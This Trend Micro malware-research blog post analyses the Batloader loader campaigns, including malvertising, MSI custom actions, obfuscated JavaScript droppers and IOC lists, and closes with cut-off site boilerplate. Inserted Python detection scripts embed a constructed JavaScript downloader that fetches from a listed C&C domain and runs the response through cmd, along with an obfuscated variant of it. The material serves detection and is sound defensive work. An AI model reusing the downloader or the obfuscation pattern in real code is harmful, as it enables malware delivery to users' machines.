URL: https://www.trendmicro.com/en_us/research/23/a/batloader-malware-abuses-legitimate-tools-uses-obfuscated-javasc.html
Malware
Batloader Malware Abuses Legitimate Tools, Uses Obfuscated JavaScript Files in
Q4 2022 Attacks


We discuss the Batloader malware campaigns we observed in the last quarter of
2022, including our analysis of Water Minyades-related events (This is the
intrusion set we track behind the creation of Batloader).

By: Junestherry Dela Cruz January 17, 2023 Read time: 10 min (2728 words)


Batloader (detected by Trend Micro as Trojan.Win32.BATLOADER) is an initial
access malware family known for using malvertising and for hiding script-based
malware inside Microsoft Installer (MSI) packages downloaded from
legitimate-looking but malicious websites. In early 2022, Mandiant researchers
observed Batloader using search engine optimization (SEO) poisoning in its
attacks.

Batloader is associated with an intrusion set that we have dubbed “Water
Minyades.” The actors behind Water Minyades are known for delivering other
malware during the last quarter of 2022, such as Qakbot, RaccoonStealer, and
Bumbleloader via social engineering techniques.

In this blog entry, we discuss notable Batloader campaigns that we observed in
the last quarter of 2022, including the abuse of custom action scripts from the
Advanced Installer software and the Windows Installer XML (WiX) toolset, the use
of obfuscated JavaScript files as a first-stage payload, and the use of the
PyArmor tool to obfuscate Batloader Python scripts. We also shed light on
noteworthy Water Minyades-related events and take a detailed look at
Batloader's technical details.


BATLOADER’S CAPABILITIES

The table below summarizes the capabilities of Batloader:

Anti-sandbox: Batloader is usually inflated to a very large size by being
bundled with a legitimate installer file. This can prevent sandboxes with file
size limits from detonating the file and observing its behavior.

Fingerprints host: Batloader fingerprints the host to determine whether it is a
legitimate victim. It checks environment artifacts such as the user name, the
computer name, and whether the machine is domain-joined.

Communicates with C&C: Batloader is a modular malware that communicates with
its C&C server and has been observed to drop malware according to the
characteristics of the infected host. If the host belongs to an enterprise
environment, it is more likely to drop the Atera remote management tool and a
Cobalt Strike beacon, which then leads to ransomware deployment.

Stops security software services: Batloader executes open-source scripts that
attempt to stop services related to security software, such as Windows Defender.

Escalates privileges: Batloader abuses legitimate tools such as NirCmd.exe and
NSudo.exe to escalate privileges.

Evades antivirus (AV) solutions: Batloader uses several techniques to evade
antivirus solutions: hyperinflating MSI file sizes to defeat engines with file
size limits, using very short modular scripts that are hard to detect
structurally, acquiring legitimate digital signatures for the MSI files,
obfuscating the scripts that connect to the Batloader command and control (C&C)
servers, and abusing legitimate file sharing services to host malware payloads.

Installs other components: Batloader uses a modular approach in which the
first-stage payload of a campaign is usually an MSI file bundled with custom
action scripts. These scripts download the other components of the campaign,
including the legitimate tools used to escalate privileges and download further
malware.

Installs additional malware: Batloader has been observed dropping several
malware payloads, such as Ursnif, Vidar, Bumblebee, RedLine Stealer, ZLoader,
Cobalt Strike, and SmokeLoader. It can also drop legitimate remote management
tools such as Syncro and Atera. We have also seen Batloader act as a key enabler
for Royal ransomware, the second most prevalent ransomware family we have
observed recently.

Table 1. Batloader's capabilities


EXAMINING THE WATER MINYADES INTRUSION SET

Water Minyades is known for relying heavily on defense evasion techniques, one
of which is deploying payloads with very large file sizes to evade sandbox
analysis and the file size limits of antivirus engines. Water Minyades also
abuses legitimate tools, such as the system management tool NSudo and the email
and file encryption tool Gpg4win, to elevate privileges and decrypt malicious
payloads. This intrusion set also abuses the legitimate digital signatures of
MSI files, exploits a weakness in Windows' PE Authenticode signature
verification to execute malicious scripts appended to signed DLLs (dynamic-link
libraries), and uses scripts that can be easily modified to evade scanning
engines that rely on structural signature detection.

Using Trend Micro™ Smart Protection Network™ (SPN) feedback data, we determined
that Batloader attacks are mostly deployed in the United States, Canada,
Germany, Japan, and the United Kingdom.

Country           Percentage of attacks
United States     61
Canada             8
Germany            8
Japan              4
United Kingdom     3
Australia          2
Brazil             2
Netherlands        2
Poland             1
Singapore          1
Others             8

Table 2. Distribution of Batloader attacks in Q4 2022

After tracking Water Minyades activity and backtracking it to early 2020, we
identified several noteworthy events in this timeline:

H2 2020: An open-source intelligence report indicates that this was when the
intrusion set became active. During this time, the group's most dropped payload
was the SmokeLoader malware, and it also heavily used exploit kits such as Rig
and Fallout.

Oct. 2020: The group behind the intrusion set stopped using exploit kits in
favor of social engineering schemes, which meant that targets were no longer
limited to Internet Explorer users. They posted malicious advertisements on
pornographic websites to lure victims into downloading a fake Java MSI, which
then led to the deployment of Zloader payloads.

Feb. 2022: The group distributed Batloader using SEO poisoning to trick victims
into downloading legitimate software and applications that had been trojanized
with malicious scripts. During this time, Batloader dropped Zloader and the
legitimate remote management tool Atera onto enterprise victim machines.
Batloader was also observed using the PE (portable executable) polyglot
technique, in which signed DLL files with appended malicious scripts are
executed.

Sep. 2022: Initial Batloader infections were observed to lead to Cobalt Strike
deployments and Royal ransomware infections.

Oct. 2022: Water Minyades actors abused Google Ads and the legitimate Keitaro
Traffic Direction System (TDS) to redirect victims into downloading Batloader.

Dec. 2022: Water Minyades actors used JavaScript files instead of MSI files as a
first-stage payload. The group eventually obfuscated the JavaScript downloaders.

Table 3. Water Minyades’ noteworthy events from 2020 to 2022


A TECHNICAL ANALYSIS OF BATLOADER

Batloader usually arrives via malicious websites that impersonate legitimate
software or applications. Victims can be redirected to these websites via
malvertising techniques and fake comments on forums containing links that lead
to Batloader distribution websites.

Based on our investigation, we determined that Batloader impersonates a slew of
legitimate software and application websites in its campaign:

 * Adobe
 * AnyDesk
 * Audacity
 * Blender
 * CCleaner
 * FileZilla
 * Fortinet
 * Foxit
 * GetNotes
 * Google Editor
 * Grammarly
 * Java
 * KMSAuto
 * LogMeIn
 * Luminar
 * Minersoft
 * PuTTY
 * Schwab
 * Slack
 * TeamViewer
 * TradingView
 * uTorrent
 * WinRAR
 * Zoho
 * Zoom

Figure 1. Examples of malicious websites that distribute Batloader

When victims select the "Install" or "Download" option, the Batloader package
is downloaded to the system as a .ZIP file.

Figure 2. The Batloader package
Figure 3. Typical Batloader kill chain

The stages below are typical Water Minyades tactics, techniques, and procedures
(TTPs) but may vary slightly over time.

Arrival

Stage 1: Water Minyades actors create malicious advertisements that abuse
legitimate services such as Google Ads and Keitaro TDS. These advertisements
lead victims to malicious websites that resemble the legitimate websites of
popular software and applications.

Infection

Stage 2: Victims are lured into installing a malicious file from the fake
website. Based on recent Water Minyades activity, this can be an MSI, VHD
(Virtual Hard Disk), VHDX (Virtual Hard Disk v2), or JavaScript file.

Stage 3: Earlier campaigns that used MSI files were observed to drop PE
polyglot binaries with malicious scripts appended. These scripts can be
executed by MSHTA.exe because of a weakness in the PE Authenticode verification
process. The MSI and VHD files usually contain a custom action script that
connects to Batloader's C&C server to download the next-stage payload.

Stage 4: Water Minyades' C&C server decides which payload to drop.

Post-infection

Stage 5: Batloader can install different malware families, such as:
 * Bumblebee loader
 * Cobalt Strike
 * Qakbot
 * Raccoon Stealer
 * RedLine Stealer
 * SmokeLoader
 * SystemBC
 * Ursnif (bot)
 * Vidar (stealer)
 * ZLoader

Based on our observations, these malware families' payloads are typically
hyperinflated in size and encrypted. Batloader can also install the following
legitimate applications to aid other stages of the kill chain, such as
privilege escalation and defense evasion:
 * NSudo: abused to run processes with elevated privileges
 * Gpg4win: abused to decrypt next-stage payloads downloaded by Batloader
 * NirCmd: a command-line utility abused alongside NSudo for privilege escalation
 * PowerShell: abused to run malicious PowerShell scripts
 * MsiExec.exe: abused to run MSI files with malicious custom action scripts
 * Mshta.exe: abused to execute malicious code appended to PE files

Batloader also abuses legitimate remote administration tools, such as Syncro and
Atera, to facilitate ransomware deployment.

Stage 6: Second-stage malware such as Ursnif, Cobalt Strike Beacon, and
Bumblebee usually connect to their own C&C servers to execute follow-on
activities.

Stage 7: Follow-on activities can include the deployment of ransomware families
such as Royal.

Table 4. Water Minyades attack stages
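Stage 3 of Table 4 and the Water Minyades section above describe signed DLLs that still pass signature verification after a script has been appended to them. Authenticode hashes the PE image but excludes the certificate table (the Security data directory) from that hash, so bytes parked inside that table after the PKCS#7 signature blob leave the signature intact, while mshta.exe, which treats the file as an HTML application, still finds and runs the script. The following Python script is an added example written for this page and is not code from the post or from Trend Micro: it parses the PE headers, finds the certificate table, measures the unsigned slack after the DER-encoded PKCS#7 SEQUENCE, and separately reports any overlay after the table. To run offline it constructs a minimal synthetic PE32 DLL with a placeholder certificate blob; the header layouts follow the PE/COFF and WIN_CERTIFICATE formats, but the sample file, its section, the dummy blob and the appended script are constructed and not taken from a Batloader sample.

```python
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # data directory index of the Authenticode certificate table


def _u16(buf, off):
    return struct.unpack_from("<H", buf, off)[0]


def _u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]


def der_element_len(buf, off):
    """Total size (tag + length + content) of the DER element at buf[off:], or None if malformed."""
    if off + 2 > len(buf):
        return None
    first = buf[off + 1]
    if first < 0x80:                      # short-form length
        return 2 + first
    n = first & 0x7F                      # long form: n length bytes follow
    if n == 0 or off + 2 + n > len(buf):
        return None
    return 2 + n + int.from_bytes(buf[off + 2:off + 2 + n], "big")


def authenticode_slack(data):
    """Return the bytes of a PE image that the Authenticode hash does not cover.

    'slack'   = bytes inside the certificate table after the PKCS#7 SignedData blob
                (zero alignment padding stripped). The whole table is excluded from the
                hash, so a script parked here leaves the signature valid.
    'overlay' = bytes after the certificate table (or after the last section if unsigned).
    """
    e_lfanew = _u32(data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    nsections = _u16(data, coff + 2)
    opt_size = _u16(data, coff + 16)
    opt = coff + 20
    magic = _u16(data, opt)
    dirs = opt + (96 if magic == 0x10B else 112)      # PE32 vs PE32+ data directory offset
    cert_off, cert_size = struct.unpack_from("<II", data, dirs + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)

    sections_end = 0                                   # end of the last section's raw data
    sec_tbl = opt + opt_size
    for i in range(nsections):
        raw_size, raw_ptr = struct.unpack_from("<II", data, sec_tbl + i * 40 + 16)
        sections_end = max(sections_end, raw_ptr + raw_size)

    if cert_size == 0:
        return {"signed": False, "slack": b"", "overlay": data[sections_end:]}

    # WIN_CERTIFICATE: dwLength, wRevision, wCertificateType, then bCertificate (PKCS#7 DER)
    pkcs7_off = cert_off + 8
    pkcs7_len = der_element_len(data, pkcs7_off)
    if data[pkcs7_off] != 0x30 or pkcs7_len is None:
        raise ValueError("certificate table does not start with a DER SEQUENCE")
    cert_end = cert_off + cert_size
    slack = data[pkcs7_off + pkcs7_len:cert_end].rstrip(b"\0")  # benign files have <8 zero bytes here
    return {"signed": True, "slack": slack, "overlay": data[cert_end:]}


def build_sample_pe(appended=b""):
    """Construct a minimal fake PE32 DLL with a placeholder certificate table (NOT a real signature)."""
    section_off, section_size = 0x200, 0x200
    cert_off = section_off + section_size
    pkcs7 = b"\x30\x82" + struct.pack(">H", 0x40) + b"\xAA" * 0x40   # DER SEQUENCE of 0x40 dummy bytes
    body = pkcs7 + appended
    body += b"\0" * (-len(body) % 8)                                  # WIN_CERTIFICATE is 8-byte aligned
    win_cert = struct.pack("<IHH", 8 + len(body), 0x0200, 0x0002) + body
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)              # e_lfanew -> 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x2102)
    opt = struct.pack("<H", 0x10B) + b"\0" * 94                       # PE32 magic, other fields zeroed
    dirs = [(0, 0)] * 16
    dirs[IMAGE_DIRECTORY_ENTRY_SECURITY] = (cert_off, len(win_cert))
    opt += b"".join(struct.pack("<II", va, sz) for va, sz in dirs)
    sec = b".text\0\0\0" + struct.pack("<IIIIIIHHI", section_size, 0x1000, section_size,
                                       section_off, 0, 0, 0, 0, 0x60000020)
    headers = dos + coff + opt + sec
    headers += b"\0" * (section_off - len(headers))
    return headers + b"\xCC" * section_size + win_cert


if __name__ == "__main__":
    samples = (("clean", build_sample_pe()),
               ("polyglot", build_sample_pe(b"<html><script>WScript.Echo('hta')</script></html>")))
    for label, blob in samples:
        r = authenticode_slack(blob)
        print(f"{label}: signed={r['signed']} slack={len(r['slack'])}B overlay={len(r['overlay'])}B")
        if r["slack"]:
            print("  unsigned data inside certificate table:", r["slack"][:60])
```

On a real sample, call authenticode_slack() on the file bytes: non-empty slack that contains <script> or other readable text is the polyglot pattern, whereas a legitimately signed file carries only a few zero bytes of alignment padding there. The check is a static heuristic and does not validate the signature itself; pair it with a signature verification tool before drawing conclusions.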


BATLOADER’S NOTABLE Q4 CAMPAIGNS

In this section, we describe the techniques observed in the different Q4
campaigns. Although Batloader is predominantly script-based, this intrusion set
continuously finds ways to evade detection and improve its anti-analysis
techniques by using legitimate tools to hide and obfuscate its scripts.

Abuse of custom action scripts of the Advanced Installer software

We have observed Batloader MSI packages that wrap a legitimate installer file
and launch the malware through a custom action PowerShell script. This was
potentially done by abusing the Advanced Installer software's 30-day free trial
application form.

Figure 4. Advanced Installer’s 30-day free trial form abused by Water Minyades
actors
Figure 5. An example of an MSI file with a custom action PowerShell script
viewed using the Pe Studio tool

In Figure 6, we can see that the Batloader script was launched via the
“PowerShellScriptLauncher.dll” file that was created using the Advanced
Installer software.

Figure 6. Batloader script launched via “PowerShellScriptLauncher.dll”
Figure 7. Batloader kill chain using compromised MSI package

From our tracking, this technique was used in a number of campaigns between
September 2022 and December 2022.

Figure 8. Batloader C&C server activities abusing Advanced Installer software.
Data taken from Trend Micro SPN.

Abuse of Windows Installer XML Toolset

Another tool recently abused by Water Minyades actors is the WiX toolset.

Figure 9. An example of an MSI file created using the WiX toolset viewed using
the PE Studio tool

Using this toolset, malicious actors can insert a custom action script and
specify when it will be executed. In Figure 10, the custom action
"checkforupdate.bat" is executed; it in turn drops and executes additional
malicious scripts from the "update.zip" file.

Figure 10. A custom action created using the WiX toolset
Figure 11. Snippet of code from checkforupdate.bat’s follow-on activities

We also observed a significant number of campaigns using this technique during
the month of November 2022.

Figure 12. Batloader C&C server activities abusing Windows Installer XML
Toolset. Data taken from Trend Micro SPN.

Use of JavaScript files instead of MSI files in campaigns

Starting November 27, 2022, we observed that Water Minyades actors switched to
using JavaScript files instead of MSI files as the initial Batloader payload.

This technique uses small JavaScript files with straightforward commands, ones
that are also used for non-malicious purposes. This is in direct contrast to the
MSI technique, in which file sizes are hyperinflated to evade scanning engines
with file size limits.

From a detection standpoint, this also poses a challenge: the only malicious
parts of the file are the C&C URLs themselves, so a structure-based detection
algorithm would flag non-malicious JavaScript files as well.

Figure 13. Contents of a Batloader JavaScript file named “InstallerV61.js”

This highlights the need for a multilayered security solution, one that can
successfully detect malicious artifacts related to Batloader campaigns.

After a few days of analyzing this Batloader campaign, we have observed that the
malicious actors behind it have obfuscated the JavaScript files as an additional
detection evasion measure.

Figure 14. An obfuscated Batloader JavaScript file
Figure 15. A typical execution chain for the JavaScript Batloader campaign
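The point made above is that a structural signature gives little purchase on these files, so the domains they contact become the detection surface, and the obfuscation in Figure 14 exists to keep those domains out of a plain string match. The following Python script is an added example for this page, not code from the post or from Trend Micro: it folds the cheap string tricks that hide a URL from a grep (hex and unicode escapes, String.fromCharCode, literal concatenation), extracts every host the script talks to, and matches the result against the Batloader C&C domains listed in the IOC section of this post. The two JavaScript samples embedded in it are constructed for the example and are not the contents of InstallerV61.js or of the obfuscated file in Figure 14.

```python
import re

# Batloader C&C domains from the IOC section of this post, kept in defanged form.
BATLOADER_C2 = """
105105105015[.]com 24xpixeladvertising[.]com clodtechnology[.]com cloudupdatesss[.]com
externalchecksso[.]com grammarlycheck2[.]com installationsoftware1[.]com installationupgrade6[.]com
internalcheckssso[.]com t1pixel[.]com updatea1[.]com updateclientssoftware[.]com updatecloudservice1[.]com
""".split()

_HEX = re.compile(r"\\x([0-9a-fA-F]{2})")
_UNI = re.compile(r"\\u([0-9a-fA-F]{4})")
_FROMCC = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")
_CONCAT = re.compile(r"""(["'])([^"']*)\1\s*\+\s*(["'])([^"']*)\3""")
_HOST = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)


def refang(ioc):
    return ioc.replace("[.]", ".").lower()


def normalize_js(src):
    """Undo the string tricks that keep a C&C URL out of a plain grep:
    \\xHH and \\uHHHH escapes, String.fromCharCode(...), and "a" + "b" literal concatenation."""
    src = _HEX.sub(lambda m: chr(int(m.group(1), 16)), src)
    src = _UNI.sub(lambda m: chr(int(m.group(1), 16)), src)
    src = _FROMCC.sub(lambda m: '"' + "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()) + '"', src)
    prev = None
    while prev != src:   # fold "h" + "t" + "tps://" pairwise until nothing changes
        prev, src = src, _CONCAT.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', src)
    return src


def extract_hosts(src):
    """Every host named in an http(s) URL after normalisation, lower-cased."""
    return {h.lower() for h in _HOST.findall(normalize_js(src))}


def match_iocs(src, iocs=BATLOADER_C2):
    """Hosts in the script that equal, or are subdomains of, a known C&C domain."""
    bad = {refang(i) for i in iocs}
    return sorted(h for h in extract_hosts(src)
                  if h in bad or any(h.endswith("." + b) for b in bad))


# Constructed sample (not the real InstallerV61.js): a bare downloader of the kind the post describes.
PLAIN_JS = r'''
var sh = new ActiveXObject("WScript.Shell");
var x = new ActiveXObject("MSXML2.XMLHTTP");
x.open("GET", "https://installationupgrade6.com/update.php", false);
x.send();
sh.Run("cmd /c " + x.responseText, 0, true);
'''

# Constructed sample: the same downloader with the URL split across concatenation, hex escapes and fromCharCode.
OBF_JS = r'''
var u = "h" + "t" + "t" + "ps://" + String.fromCharCode(117,112,100,97,116,101) + "\x63\x6c\x69\x65\x6e\x74\x73" + "software.com/a";
var x = new ActiveXObject("MSXML2.XMLHTTP"); x.open("GET", u, false); x.send();
'''

if __name__ == "__main__":
    for name, js in (("plain", PLAIN_JS), ("obfuscated", OBF_JS)):
        print(name, "->", match_iocs(js) or "no known Batloader C&C")
```

The normalisation is deliberately shallow: it handles patterns that only hide the string, not an obfuscator that rebuilds the URL at run time, which is where script emulation or sandbox detonation takes over. Matching subdomains as well as exact hosts catches the common trick of prefixing a known C&C domain.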

Based on the distribution domains used in this campaign, we believe that this
campaign was launched during Black Friday:

 * logmeinofferblackfriday[.]com
 * anydeskofferblackfriday[.]com
 * zoomofferblackfriday[.]com
 * slackcloudservices[.]com

According to our telemetry, a significant number of campaigns used this
technique between the end of November and the first week of December 2022.

Figure 16. Batloader C&C server activities abusing JavaScript downloaders. Data
taken from Trend Micro SPN.

Use of PyArmor tool to obfuscate Batloader Python script

After the JavaScript campaigns, we observed from the second week of December
2022 onward that the group abused the Advanced Installer software again. This
time, the file executed at the end of the chain is a Python script protected
with PyArmor.

We found a sample MSI file (SHA256:
2e65cfebde138e4dd816d3e8b8105e796c4eb38cfa27015938c0445ee5be8331), a trojanized
Chat Mapper installer masquerading as an AnyDesk installer (Anydesk.msi). The
installer was created with the Advanced Installer application, and one of its
custom actions executes a file called "viewer.exe" with the command line
"#InstallPython.bat".

Figure 17. Custom Action script of the latest Batloader campaign observed in Q4
2022

InstallPython.bat installs Python 3.9.9, copies and extracts the openssl.zip
archive, and runs the PyArmor-protected Python script main4.py.

Figure 18. InstallPython.bat

PyArmor is a free-with-restrictions command-line tool for obfuscating Python
scripts. The obfuscated Python file in this case is named main4.py:

Figure 19. Batloader PyArmor-protected Python script

Deobfuscating this script with the techniques documented by PyArmor Unpacker,
we see that it connects to the Batloader C&C server
updateclientssoftware[.]com. We observed this C&C server active from the second
week of December 2022 until the second week of January 2023, and we continue to
monitor the campaign for additional activity.

Figure 20. Connecting to the Batloader C&C
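The Advanced Installer, WiX, and PyArmor campaigns above differ in packaging but share a process lineage: msiexec.exe runs a custom action, which ends up spawning a script host (cmd.exe, PowerShell, python.exe) or a helper such as NSudo. The following Python script is an added example for this page and not code from the post or from Trend Micro: it rebuilds parent-child chains from process-creation events and applies three rules drawn from the behavior described in this post, namely a script host or escalation helper descending from msiexec.exe, mshta.exe being handed a DLL (the appended-script polyglot), and Windows Script Host being launched on a .js file (the JavaScript first stage). The events are constructed; the file names Anydesk.msi, viewer.exe, InstallPython.bat, main4.py and InstallerV61.js come from the post, while the directories, PIDs, the Python install path and signed.dll are assumptions.

```python
import ntpath
import re

# Script hosts and helper tools the post shows Batloader chaining behind msiexec.exe.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "python.exe", "pythonw.exe", "nsudo.exe", "nircmd.exe"}


def _image_name(path):
    return ntpath.basename(path).lower()


def ancestry(procs, pid):
    """Image names from the process itself up to the root, following ppid links (cycle-safe)."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(_image_name(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return chain


def hunt(events):
    """Return (rule, pid, chain) for every process-creation event matching one of three Batloader patterns."""
    procs = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        name = _image_name(e["image"])
        cmd = e.get("cmdline", "").lower()
        lineage = ancestry(procs, e["pid"])
        chain = " <- ".join(lineage)
        # 1. an MSI custom action (Advanced Installer launcher DLL, WiX .bat, viewer.exe + InstallPython.bat)
        #    ends up running a script host or privilege-escalation helper somewhere under msiexec.exe
        if name in SCRIPT_HOSTS and "msiexec.exe" in lineage[1:]:
            hits.append(("msiexec-descendant-script-host", e["pid"], chain))
        # 2. mshta.exe handed a DLL: the appended-script PE polyglot from stage 3 of the kill chain
        if name == "mshta.exe" and re.search(r"\.dll\b", cmd):
            hits.append(("mshta-executes-dll", e["pid"], chain))
        # 3. Windows Script Host launched on a .js file: the JavaScript first stage
        if name in {"wscript.exe", "cscript.exe"} and re.search(r"\.js\b", cmd):
            hits.append(("wsh-runs-js-file", e["pid"], chain))
    return hits


# Constructed process-creation events (Sysmon Event ID 1 style, reduced to the fields used here).
# File names come from the post; directories, PIDs and the Python path are assumptions.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe",                  "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\msiexec.exe",          "cmdline": r'msiexec.exe /i "C:\Users\u\Downloads\Anydesk.msi"'},
    {"pid": 210, "ppid": 200, "image": r"C:\Users\u\AppData\Local\Temp\viewer.exe", "cmdline": "viewer.exe #InstallPython.bat"},
    {"pid": 220, "ppid": 210, "image": r"C:\Windows\System32\cmd.exe",              "cmdline": "cmd.exe /c InstallPython.bat"},
    {"pid": 230, "ppid": 220, "image": r"C:\Python39\python.exe",                   "cmdline": "python.exe main4.py"},
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",            "cmdline": r"mshta.exe C:\Users\u\AppData\Local\Temp\signed.dll"},
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",          "cmdline": r"wscript.exe C:\Users\u\Downloads\InstallerV61.js"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",              "cmdline": "cmd.exe"},  # benign: no msiexec ancestor
]

if __name__ == "__main__":
    for rule, pid, chain in hunt(SAMPLE_EVENTS):
        print(f"[{rule}] pid={pid}: {chain}")
```

Feed it Sysmon Event ID 1 or EDR process-creation records carrying pid, ppid, image and cmdline. Rule 1 is the broad one and will also fire on legitimate installers whose custom actions run scripts, so in production it is worth scoping it by the MSI's signer or download location; rules 2 and 3 are narrow enough to alert on directly.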

Batloader’s C&C Activities in Q4 2022

We started observing an increase in Water Minyades activity in September 2022,
which was also when we first saw Batloader deploying Royal ransomware to its
victims. The number of attacks peaked from November until the first week of
December 2022.

Figure 21. Batloader requests to C&C domain from October to December 2022. Data
taken from Trend Micro SPN.
Figure 22. Most requested Batloader C&C domains from October to December 2022.
Data taken from Trend Micro SPN.

The C&C domain with the most requests in Q4 2022 is
"installationupgrade6[.]com." Interestingly, this was the first C&C domain used
in the Batloader campaign that relied on JavaScript droppers and Black Friday
sale-themed malicious distribution websites.

This suggests that victims are more likely to fall for malvertising campaigns
that promote sales or discounts, and highlights how much the success of these
campaigns depends on the social engineering lure.


CONCLUSION

Based on our investigation, Batloader is a highly evasive and constantly
evolving malware family capable of deploying different types of malware,
including loaders, bots, and ransomware. Batloader tricks victims with a range
of malvertising and social engineering techniques to distribute its payloads.

Batloader is a prime example of a modern malware and a modular threat, and
protecting systems against it requires not just one defensive strategy, but a
robust and multilayered solution that provides shared visibility from a central
place. Trend Micro Vision One™ is a technology that can provide powerful XDR
capabilities that collect and automatically correlate data across multiple
security layers — from email and endpoints to servers, cloud workloads, and
networks. Trend Vision One can prevent attacks via automated protection, while
also ensuring that no significant incidents go unnoticed.


INDICATORS OF COMPROMISE (IOCS)

URLs

105105105015[.]com             Batloader C&C server
24xpixeladvertising[.]com      Batloader C&C server
clodtechnology[.]com           Batloader C&C server
cloudupdatesss[.]com           Batloader C&C server
externalchecksso[.]com         Batloader C&C server
grammarlycheck2[.]com          Batloader C&C server
installationsoftware1[.]com    Batloader C&C server
installationupgrade6[.]com     Batloader C&C server
internalcheckssso[.]com        Batloader C&C server
t1pixel[.]com                  Batloader C&C server
updatea1[.]com                 Batloader C&C server
updateclientssoftware[.]com    Batloader C&C server
updatecloudservice1[.]com      Batloader C&C server

SHA256, description, detection

23373654d02cb7eace932609826cca4f82fcac67ca44b9328baba385acc00c67
  Batloader file (component of 2e65cfebde138e4dd816d3e8b8105e796c4eb38cfa27015938c0445ee5be8331)
  Trojan.BAT.BATLOADER.A
f8f3f22425ea72fafba5453c70c299367bd144c95e61b348d1e6dda0c469e219
  Batloader file (component of 2e65cfebde138e4dd816d3e8b8105e796c4eb38cfa27015938c0445ee5be8331)
  Trojan.Python.BATLOADER.A
61e0926120f49b3d5edf3a5e0842b04640911974ecbbc93b6b33ca20c1f981bc
  Batloader file
  Trojan.JS.BATLOADER.SMYXCLAZ
91730741d72584f96ccba99ac9387e09b17be6d64728673871858ea917543c1e
  Batloader file
  Trojan.JS.BATLOADER.SMYXCLAZ
aef18b7ab1710aaeb0d060127750ba9d17413035309ec74213d538fb1b1bdf79
  Batloader file
  Trojan.JS.BATLOADER.SMYXCLAZ
e7735cb541e7afd50759eae860b7d1a43d627fbf5cd96d016241084e91659817
  Batloader file
  Trojan.JS.BATLOADER.SMYXCLAZ
23a5981d086242349f6e3476eff11ea3244cebef3d65c76c7bc74470c1ec4b49
  Batloader file
  Trojan.Win32.BATLOADER.SMYXCK3Z
3707ad9d9ea318757883ede9691e5c4e8d778c839a056f8b4a94ed47a76da2c8
  Batloader file
  Trojan.Win32.BATLOADER.SMYXCK3Z
86f6af51d30159f4d2e00ed733a88dc05cc5dd846b1b2d1ba30582f6e33ac998
  Batloader file
  Trojan.Win32.BATLOADER.SMYXCK3Z
b28047cda1c688c844f676e94770c08cf570f4d65fa4c5e4454ae449c2439e3f
  Batloader file
  Trojan.Win32.BATLOADER.SMYXCK3Z
e1dcc098a6585dbbf4df64f09f8e8508e218485e1958fe6fe04b91547e109a83
  Batloader file
  Trojan.Win32.BATLOADER.SMYXCK3Z
e528cb5e7a2d04269d955ce771b7326bae929355807039f49106126b1a5ff227
  Batloader file
  Trojan.Win32.FRS.VSNW1DK22 / Trojan.PS1.BATLOADER.SMYXCK3Z
fcbfbc2ae4ed3e51631ecb3184004d96f0a6fd5e9de55400dedfa6b5cafc7c41
  Batloader file
  Trojan.Win32.FRS.VSNW1DK22 / Trojan.PS1.BATLOADER.SMYXCK3Z

Tags
Malware | Endpoints | Research | Articles, News, Reports


AUTHORS

 * Junestherry Dela Cruz
   
   Threats Analyst


Copyright © 2023 Trend Micro Incorporated. All rights reserved.

Text Magnifier
Adjust Font Sizing
Default

Align Center
Adjust Line Height
Default

Align Left
Adjust Letter Spacing
Default

Align Right
Color Adjustments
Dark Contrast
Light Contrast
High Contrast
High Saturation
Adjust Text Colors
Cancel
Monochrome
Adjust Title Colors
Cancel
Low Saturation
Adjust Background Colors
Cancel
Orientation Adjustments
Mute Sounds
Hide Images
Read Mode
Reading Guide
Useful Links
Select an option Home Header Footer Main Content
Stop Animations
Reading Mask
Highlight Hover
Highlight Focus
Big Black Cursor
Big White Cursor
HIDDEN_ADJUSTMENTS
Keyboard Navigation
Accessible Mode
Screen Reader Adjustments
Read Mode
Web Accessibility By
Learn More
Choose the Interface Language
English
Español
Deutsch
Português
Français
Italiano
עברית
繁體中文
Pусский
عربى
عربى
Nederlands
繁體中文
日本語
Polski
Türk
Accessibility StatementCompliance status

We firmly believe that the internet should be available and accessible to anyone
and are committed to providing a website that is accessible to the broadest
possible audience, regardless of ability.

To fulfill this, we aim to adhere as strictly as possible to the World Wide Web
Consortium’s (W3C) Web Content Accessibility Guidelines 2.1 (WCAG 2.1) at the AA
level. These guidelines explain how to make web content accessible to people
with a wide array of disabilities. Complying with those guidelines helps us
ensure that the website is accessible to blind people, people with motor
impairments, visual impairment, cognitive disabilities, and more.

This website utilizes various technologies that are meant to make it as
accessible as possible at all times. We utilize an accessibility interface that
allows persons with specific disabilities to adjust the website’s UI (user
interface) and design it to their personal needs.

Additionally, the website utilizes an AI-based application that runs in the
background and optimizes its accessibility level constantly. This application
remediates the website’s HTML, adapts its functionality and behavior for
screen-readers used by blind users, and for keyboard functions used by
individuals with motor impairments.

If you wish to contact the website’s owner please use the website's form

Screen-reader and keyboard navigation

Our website implements the ARIA attributes (Accessible Rich Internet
Applications) technique, alongside various behavioral changes, to ensure blind
users visiting with screen-readers can read, comprehend, and enjoy the website’s
functions. As soon as a user with a screen-reader enters your site, they
immediately receive a prompt to enter the Screen-Reader Profile so they can
browse and operate your site effectively. Here’s how our website covers some of
the most important screen-reader requirements:

 1. Screen-reader optimization: we run a process that learns the website’s
    components from top to bottom, to ensure ongoing compliance even when
    updating the website. In this process, we provide screen-readers with
    meaningful data using the ARIA set of attributes. For example, we provide
